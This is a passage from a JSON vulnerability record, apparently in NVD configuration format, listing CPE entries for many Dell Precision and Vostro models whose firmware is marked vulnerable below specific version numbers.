"OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3620_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3650_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3650_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3660_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3660:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3930_rack_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3930_rack:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_5470_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_5470:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_5480_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_5480:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_5520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.37.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_5520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_5530_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.36.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_5530:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_5530_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.8", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_5530_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_5540_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_5540:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_5550_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_5550:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_5560_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_5560:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_5570_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_5570:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_5680_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.10.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_5680:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_5750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_5750:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_5760_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_5760:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_5770_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_5770:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_5860_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.1.17", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_5860_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.35.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7530_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.33.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7530:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7540_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.31.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7540:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7550_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7550:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7560_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7560:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7670_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7670:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7680_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.10.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7680:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7720_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.35.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7720:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7730_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.33.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7730:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7740_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.31.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7740:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7750:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7760_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7760:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7770_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7770:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7780_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.10.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7780:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7865_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7865_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7875_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "01.03.00", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7875_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_7960_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.1.16", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_7960_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_13_5310_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_13_5310:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_14_3420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.22.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_14_3420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_14_3430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_14_3430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_14_3440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.3.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_14_3440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_14_5410_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_14_5410:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_15_3510_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_15_3510:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_15_3520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.22.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_15_3520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_15_3530_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_15_3530:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_15_5510_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_15_5510:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_15_7510_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.22.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_15_7510:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_16_5630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_16_5630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_16_5640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.2.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_16_5640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_3020_small_desktop_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_3020_small_desktop:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_3020_tower_desktop_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_3020_tower_desktop:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_3030s_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.3.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_3030s:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_3400_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_3400:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_3401_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_3401:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_3480_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_3480:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_3500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_3500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_3501_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_3501:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_3580_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_3580:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_3583_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_3583:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : 